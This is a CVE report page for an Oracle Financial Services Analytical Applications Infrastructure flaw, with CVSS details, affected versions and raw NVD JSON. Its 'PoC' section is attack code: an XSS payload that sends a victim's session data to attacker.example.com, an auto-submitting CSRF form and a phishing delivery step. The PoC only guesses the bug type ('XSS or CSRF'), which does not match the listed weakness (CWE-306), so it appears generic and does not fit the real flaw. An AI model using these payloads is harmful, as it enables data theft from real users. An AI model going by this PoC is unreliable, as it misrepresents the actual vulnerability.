Security Vulnerability Report
中文
CVE-2025-53034 CVSS 5.4 MEDIUM

CVE-2025-53034

Published: 2025-10-21 20:20:40
Last Modified: 2025-10-28 16:16:57

Description

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N).

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.0.7.9
Oracle Financial Services Analytical Applications Infrastructure 8.0.8.7
Oracle Financial Services Analytical Applications Infrastructure 8.1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53034 PoC - Oracle Financial Services Analytical Applications Infrastructure # Vulnerability: Reflected/Stored XSS or CSRF in Platform component # CVSS: 5.4 (MEDIUM) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N import requests from urllib.parse import urlencode TARGET_URL = "https://target-oracle-fsaai.example.com/platform/endpoint" # Step 1: Craft malicious URL with injected payload def craft_malicious_url(base_url, payload): """Generate a malicious URL containing XSS payload for phishing""" params = {"search": payload, "redirect": payload} malicious_url = f"{base_url}?{urlencode(params)}" return malicious_url # Step 2: XSS payload to steal/modify data via victim's session xss_payload = ( "<script>" "fetch('/platform/api/data', {credentials: 'include'})" ".then(r => r.json())" ".then(d => fetch('https://attacker.example.com/exfil', {method: 'POST', body: JSON.stringify(d)}));" "</script>" ) # Step 3: CSRF payload to perform unauthorized data modification csrf_payload = ( "<form action='https://target-oracle-fsaai.example.com/platform/api/update' method='POST' id='csrf'>" "<input type='hidden' name='data' value='malicious_data'/>" "</form>" "<script>document.getElementById('csrf').submit();</script>" ) # Step 4: Deliver the payload via phishing def deliver_payload(victim_email, malicious_url): """Simulate phishing email delivery (for authorized testing only)""" print(f"[*] Malicious URL crafted: {malicious_url}") print(f"[*] Send this URL to victim: {victim_email}") print("[*] When victim (authenticated to Oracle FSAAI) clicks, attack executes") if __name__ == "__main__": url = craft_malicious_url(TARGET_URL, xss_payload) deliver_payload("[email protected]", url) print("[!] For authorized penetration testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53034", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:40.487", "lastModified": "2025-10-28T16:16:57.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}